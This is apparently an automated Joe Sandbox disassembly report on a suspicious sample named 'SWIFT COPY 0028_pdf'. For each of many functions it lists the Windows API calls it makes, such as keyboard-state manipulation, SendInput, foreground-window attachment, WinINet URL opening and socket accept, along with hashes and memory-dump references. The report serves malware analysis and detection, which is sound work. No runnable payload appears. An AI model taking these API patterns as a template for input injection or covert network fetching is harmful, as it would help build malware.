                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 3877424927-0
                                                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                    • Instruction ID: c700c5d7ad86ed14229be10c46d54cb21756ba0981380e1917a773fb4784a6cb
                                                                                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                    • Instruction Fuzzy Hash: EF5195B0A00306ABDB289FB98885E6E77B9AF40324F25C729F875967D0D7759F508F40
                                                                                    Function 0098C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00FF5CC0,?), ref: 0098C544
                                                                                    • ScreenToClient.USER32(?,00000002), ref: 0098C574
                                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0098C5DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: 57e6c1b07240ddea9845fa28e99a0ea4aa6c51d675cee7094b923d8af3a82cd9
                                                                                    • Instruction ID: bdea790b284fe93d927d969f31a9b6bbaf52f234542d8957c5ef09ba26aabc52
                                                                                    • Opcode Fuzzy Hash: 57e6c1b07240ddea9845fa28e99a0ea4aa6c51d675cee7094b923d8af3a82cd9
                                                                                    • Instruction Fuzzy Hash: 31513FB5904209EFCF10EF68C880AAE7BB9EF55720F108669F9559B390D730ED41DBA0
                                                                                    Function 0095C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0095C462
                                                                                    • __itow.LIBCMT ref: 0095C49C
                                                                                      • Part of subcall function 0095C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0095C753
                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0095C505
                                                                                    • __itow.LIBCMT ref: 0095C55A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 9b3b1b16b49d0216ed6ae4eeadc048e024ae8534f00282d0c606569784d5091c
                                                                                    • Instruction ID: 80f0f676a185f7ab529fe388b2f29e35fb5d07f1cda4091186752e2471fa7eba
                                                                                    • Opcode Fuzzy Hash: 9b3b1b16b49d0216ed6ae4eeadc048e024ae8534f00282d0c606569784d5091c
                                                                                    • Instruction Fuzzy Hash: 1E41F8B1A00318AFDF21DF55D855FEE7BB9AF89701F000019FD05A7292DB749A49CBA1
                                                                                    Function 0096390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00963966
                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00963982
                                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009639EF
                                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00963A4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: b085ab73c864c7d54ea631759ecc833c67143c3f582c5e1603b4530db779ad38
                                                                                    • Instruction ID: 08cbfffd93f60efb1ebc61f45617f0c2a6ee0018d9679a1a0032db567e393eaf
                                                                                    • Opcode Fuzzy Hash: b085ab73c864c7d54ea631759ecc833c67143c3f582c5e1603b4530db779ad38
                                                                                    • Instruction Fuzzy Hash: 20411870E04648EEEF208B64C805BFDBBB99F55310F04815AF4C2922C1C7B88E85EB65
                                                                                    Function 0098B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0098B5D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: 7b4c162b5113e78043a7794c458da8530fe0ad757d56f23cf039bf0e0fddafd8
                                                                                    • Instruction ID: fecbdca88ce2ae471880c0458f405b81140394f87b766c523f8112d365ab5cc1
                                                                                    • Opcode Fuzzy Hash: 7b4c162b5113e78043a7794c458da8530fe0ad757d56f23cf039bf0e0fddafd8
                                                                                    • Instruction Fuzzy Hash: E531C175611208BFEF30AF18CC89FAC7BA9EB06720F5C4511FA52D63E1E734A9409B95
                                                                                    Function 0098D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098D807
                                                                                    • GetWindowRect.USER32(?,?), ref: 0098D87D
                                                                                    • PtInRect.USER32(?,?,0098ED5A), ref: 0098D88D
                                                                                    • MessageBeep.USER32(00000000), ref: 0098D8FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: 0bb46b6f3faf38a61d03a36a42eb0768e7c844c2f5bee06730bc3ac1c88cf1fa
                                                                                    • Instruction ID: 9b5d3d9554e5f44e641a55a2d529ae110146c642260a22c7313ced9707414a64
                                                                                    • Opcode Fuzzy Hash: 0bb46b6f3faf38a61d03a36a42eb0768e7c844c2f5bee06730bc3ac1c88cf1fa
                                                                                    • Instruction Fuzzy Hash: 15419A70A06219EFCB11EF58D884BA97BF9FF49710F1881A9E415CB3A0D330E941DB80
                                                                                    Function 00963A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00963AB8
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00963AD4
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00963B34
                                                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00963B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: c8fbbadd8b7e1e7d98786e535d51cfd7de6debfdef92ab92a7559ed0f3e56453
                                                                                    • Instruction ID: fffac63fb88407765de1251292cf7a56d79d8bd1022e7c3b174272a18f023d52
                                                                                    • Opcode Fuzzy Hash: c8fbbadd8b7e1e7d98786e535d51cfd7de6debfdef92ab92a7559ed0f3e56453
                                                                                    • Instruction Fuzzy Hash: D3312630E04258AEFF218B758819BFE7BA99F56310F04815AE482932D1C7758F45D761
                                                                                    Function 00954004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00954038
                                                                                    • __isleadbyte_l.LIBCMT ref: 00954066
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00954094
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009540CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: c789b447e914c2f746b143bd15be672bd91d65cd131a74065bf0d99030657128
                                                                                    • Instruction ID: 835a1f44b93af3e6821692fdf4a64396f07d1bca6bfa7041edde27e5afd596ad
                                                                                    • Opcode Fuzzy Hash: c789b447e914c2f746b143bd15be672bd91d65cd131a74065bf0d99030657128
                                                                                    • Instruction Fuzzy Hash: DB31D230604206EFDB61DF76C844BAA7BA9FF41316F254428EA618B1D0E731D8D8DB90
                                                                                    Function 00987CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00987CB9
                                                                                      • Part of subcall function 00965F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00965F6F
                                                                                      • Part of subcall function 00965F55: GetCurrentThreadId.KERNEL32 ref: 00965F76
                                                                                      • Part of subcall function 00965F55: AttachThreadInput.USER32(00000000,?,0096781F), ref: 00965F7D
                                                                                    • GetCaretPos.USER32(?), ref: 00987CCA
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00987D03
                                                                                    • GetForegroundWindow.USER32 ref: 00987D09
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: 78fc938b448450d037d3974889c17a04c9696caa840add18c509141954649077
                                                                                    • Instruction ID: 18237152e45f8f3715084f44da8211820d0e693c709e049745f7d7cbf6ec214a
                                                                                    • Opcode Fuzzy Hash: 78fc938b448450d037d3974889c17a04c9696caa840add18c509141954649077
                                                                                    • Instruction Fuzzy Hash: 9B311EB2900108AFDB00EFA5C845AEFFBF9EF98314F118466F855E3211DA319E058FA0
                                                                                    Function 0098F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • GetCursorPos.USER32(?), ref: 0098F211
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0099E4C0,?,?,?,?,?), ref: 0098F226
                                                                                    • GetCursorPos.USER32(?), ref: 0098F270
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0099E4C0,?,?,?), ref: 0098F2A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: 6b28bc30c3deafbeb9604c607958d3c015e12825a24766f7e306b8590a820cc4
                                                                                    • Instruction ID: 9dfa465dedb329f1efd2f2f05c87d313d634672a2280a0a5d54a00682f05e945
                                                                                    • Opcode Fuzzy Hash: 6b28bc30c3deafbeb9604c607958d3c015e12825a24766f7e306b8590a820cc4
                                                                                    • Instruction Fuzzy Hash: DF21B139601018AFDB259F94C868EEEBBB9EF4A710F044069F9154B2A1D3309D50EBA0
                                                                                    Function 0097431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00974358
                                                                                      • Part of subcall function 009743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00974401
                                                                                      • Part of subcall function 009743E2: InternetCloseHandle.WININET(00000000), ref: 0097449E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: 7874a8093643e2a4d0fa5f6105f4c209fa9b7527adbd88c9fb78734968a13f40
                                                                                    • Instruction ID: 67352cfc311f4138e3c57c8c06f397ac001fd0455eed0d1570d32b35d3a5148d
                                                                                    • Opcode Fuzzy Hash: 7874a8093643e2a4d0fa5f6105f4c209fa9b7527adbd88c9fb78734968a13f40
                                                                                    • Instruction Fuzzy Hash: 8B21F373205601BFEB159F60DD00FBBB7ADFF84710F00801AFA1E96691DB719820AB90
                                                                                    Function 00988A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00988AA6
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00988AC0
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00988ACE
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00988ADC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                    • String ID:
                                                                                    • API String ID: 2169480361-0
                                                                                    • Opcode ID: fa208428d31210077cb27094ab05b6563b95a7dd984c804c13311fd0481fea60
                                                                                    • Instruction ID: 76c9903d8544b58d0f35e27dec755a535b11f67488402cc54d6651b4e9f48ca0
                                                                                    • Opcode Fuzzy Hash: fa208428d31210077cb27094ab05b6563b95a7dd984c804c13311fd0481fea60
                                                                                    • Instruction Fuzzy Hash: F8119031206121AFDB18AB18DC05FBB779DAF8A320F144519F926C73E2CB74AD018BE4
                                                                                    Function 00978A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00978AE0
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00978AF2
                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00978AFF
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978B16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastacceptselect
                                                                                    • String ID:
                                                                                    • API String ID: 385091864-0
                                                                                    • Opcode ID: 3e012a3d4e9ae93c99e84ab2b842175478e0603bd18c53478dc0df66d1cdb44e
                                                                                    • Instruction ID: 694a0598c0a66659d835714e741fea63cf13ba74fd79ef5d3e99bc6c0bb4f54e
                                                                                    • Opcode Fuzzy Hash: 3e012a3d4e9ae93c99e84ab2b842175478e0603bd18c53478dc0df66d1cdb44e
                                                                                    • Instruction Fuzzy Hash: EC216672A011249FC7159F69D885A9E7BECEF4A350F00816AF84AD7251DB749A418FD0
                                                                                    Function 00960AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00961E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00960ABB,?,?,?,0096187A,00000000,000000EF,00000119,?,?), ref: 00961E77
                                                                                      • Part of subcall function 00961E68: lstrcpyW.KERNEL32(00000000,?,?,00960ABB,?,?,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00961E9D
                                                                                      • Part of subcall function 00961E68: lstrcmpiW.KERNEL32(00000000,?,00960ABB,?,?,?,0096187A,00000000,000000EF,00000119,?,?), ref: 00961ECE
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00960AD4
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00960AFA
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00960B2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: 5452342defd1f3d8a9b1c88c2d8bc171d28acec4e198e0c89c17edde268ac6ac
                                                                                    • Instruction ID: 9f8aa4af17e83f4164387965cfee8a35a6d71bb38d9c2f10ccc42ba4ed44604f
                                                                                    • Opcode Fuzzy Hash: 5452342defd1f3d8a9b1c88c2d8bc171d28acec4e198e0c89c17edde268ac6ac
                                                                                    • Instruction Fuzzy Hash: F4118136210305AFDB25AF34DC45E7A77A9FF86354B80806AE806CB260EB719850D7E0
                                                                                    Function 00952F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00952FB5
                                                                                      • Part of subcall function 0094395C: __FF_MSGBANNER.LIBCMT ref: 00943973
                                                                                      • Part of subcall function 0094395C: __NMSG_WRITE.LIBCMT ref: 0094397A
                                                                                      • Part of subcall function 0094395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,00000001,00000000,?,?,0093F507,?,0000000E), ref: 0094399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: f58c78faea22053957e64a5807f1510619b7f40dcc8e8d2dd8aa071634e13fe3
                                                                                    • Instruction ID: 9699f5073905b3a5c0f780f81717d156eefb62052de5c5d6a139fb321c728b84
